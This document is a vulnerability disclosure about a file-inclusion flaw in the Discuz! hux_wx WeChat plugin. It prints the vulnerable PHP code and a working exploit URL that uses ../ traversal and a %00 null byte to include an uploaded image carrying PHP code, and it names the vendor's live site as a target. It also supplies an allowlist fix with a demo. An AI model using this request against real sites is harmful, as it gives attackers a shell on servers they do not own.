Discuz! WeChat Public Platform plugin: any file can be included from the front end, giving a shell directly
Summary: the front-end file of the Discuz! WeChat Public Platform plugin (hux_wx) includes whatever path the user supplies, so an attacker gets a shell directly. The attempt against the plugin center's main site was blocked by the annoying Baidu cloud WAF, but the underlying problem is still there.
Details: the plugin's front-end file builds an include path from raw request parameters. The code speaks for itself:
hux_wx.inc.php:
<?php
if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}
$wxsetting = $_G['cache']['plugin']['hux_wx'];
$paymoney = "extcredits".$wxsetting['money'];
$paymoneyname = $_G['setting']['extcredits'][$wxsetting['money']]['title'];
$mycash = C::t('#hux_wx#hux_common_member_count')->result_by_uid($_GET['uid'],$paymoney);
$user_cm = C::t('#hux_wx#hux_common_member')->fetch_by_uid($_GET['uid'],'groupid');
$gp = unserialize($wxsetting['gp']);
$postgp = unserialize($wxsetting['postgp']);
$appconfigsql = C::t('#hux_wx#hux_wx_config')->fetch_by_appid($_GET['mod'],'configs');
if ($appconfigsql) {
    $appconfigs = explode('||',$appconfigsql['configs']);
    foreach($appconfigs as $value){
        $appconfigss = explode(':',$value);
        $appconfig[$appconfigss[0]] = $appconfigss[1];
    }
}
// the two echo lines below were added by the author for this test: they show
// whether magic_quotes_gpc is on and which file the include will actually open
echo "gpc is ".get_magic_quotes_gpc()."<br>";
echo DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
// $_GET['mod'] and $_GET['ac'] reach the include path without any filtering
include DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
?>
The two echo lines are ours: they print whether magic_quotes_gpc is enabled and the exact path the include will try to open. Both $_GET['mod'] and $_GET['ac'] are concatenated into that path with no filtering at all, so we can traverse out of the mod directory with ../ and, by appending %00, truncate the hard-coded .php suffix. The null-byte trick only works when magic_quotes_gpc is off and PHP is older than 5.3.4 (later versions reject null bytes in include paths), which is why the setting is printed first.
Then we request this URL:
http://localhost/Discuz_X3.2_SC_UTF8/upload/plugin.php?id=hux_wx:hux_wx&uid=1&mod=.../&ac=data/attachment/album/201410/15/181713m2a8nnnzjv2i52n6.png%00
The response shows the included file being executed. Now let's look at how that image got onto the server and how it was found.
Without further ado, go straight to the plugin center's main site: http://www.hux.cc
This plugin sits first on the homepage, which shows how prominent it is.
Moreover, the site offers album upload and editing, so an image carrying PHP code can be uploaded as an album attachment and then pulled in through the include above.
Solution:
Filter $_GET['mod'] and $_GET['ac'] before they reach the include: allow only identifier characters, and reject anything containing '/', '..' or a null byte.
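As an added example (this is not hux_wx code, and the parameter names, directory layout and demo files are assumptions made here), the following shows one way to apply that filter: an allowlist on the raw mod and ac values, plus a realpath check that the resolved file still lies inside the plugin's mod directory. The stand-alone demo at the bottom builds a constructed directory tree in the temp directory to exercise the check with the attack inputs from the URL above.

```php
<?php
// Added example, not part of the hux_wx plugin. Assumes the same $_GET['mod'] and
// $_GET['ac'] parameters and the same source/plugin/hux_wx/mod/<mod>/<ac>.php layout.

/**
 * Return the include path for a module/action pair, or null if either value is
 * not a plain identifier ([A-Za-z0-9_], 1..64 chars). Slashes, "..", and null
 * bytes never match, so traversal and %00 truncation are rejected before any
 * path is built. The raw strings are checked, not a decoded or normalised copy.
 */
function hux_wx_mod_path(string $root, $mod, $ac): ?string
{
    $ident = '/\A[A-Za-z0-9_]{1,64}\z/';
    if (!is_string($mod) || !is_string($ac)) {
        return null; // arrays (mod[]=...) are not identifiers either
    }
    if (!preg_match($ident, $mod) || !preg_match($ident, $ac)) {
        return null;
    }
    $path = $root . '/source/plugin/hux_wx/mod/' . $mod . '/' . $ac . '.php';

    // Defence in depth: the resolved file must still sit inside the mod directory.
    // realpath() returns false for files that do not exist, so this also acts as
    // an existence check.
    $base = realpath($root . '/source/plugin/hux_wx/mod');
    $real = realpath($path);
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// How the end of hux_wx.inc.php would use it (DISCUZ_ROOT is defined by Discuz!):
//   $target = hux_wx_mod_path(DISCUZ_ROOT, $_GET['mod'], $_GET['ac']);
//   if ($target === null) { exit('Access Denied'); }
//   include $target;

// --- Stand-alone demo on a constructed tree (not a real Discuz! install) ---
$root = sys_get_temp_dir() . '/hux_wx_demo_' . getmypid();
@mkdir($root . '/source/plugin/hux_wx/mod/pay', 0700, true);
@mkdir($root . '/data/attachment/album', 0700, true);
file_put_contents($root . '/source/plugin/hux_wx/mod/pay/index.php', "<?php echo 'legit module';\n");
// stands in for an uploaded album image that carries PHP code
file_put_contents($root . '/data/attachment/album/shell.png', "<?php echo 'shell';\n");

$cases = [
    'legit'       => ['pay', 'index'],
    // the URL from the writeup, after the web server decodes ../ and %00
    'traversal'   => ['../../../../', "data/attachment/album/shell.png\0"],
    'slash in ac' => ['pay', '../../../data/attachment/album/shell.png'],
    'array param' => [['x'], 'index'],
];
foreach ($cases as $name => [$mod, $ac]) {
    $target = hux_wx_mod_path($root, $mod, $ac);
    printf("%-12s => %s\n", $name, $target === null ? 'Access Denied' : 'include ' . $target);
}
```

Only the "legit" case yields an include path; the other three are refused by the identifier allowlist before realpath() is even consulted. Note that on PHP 5.3.4 and later include() itself rejects paths containing a null byte, but that does nothing against plain ../ traversal to another .php file, so the allowlist is the fix, not the PHP version.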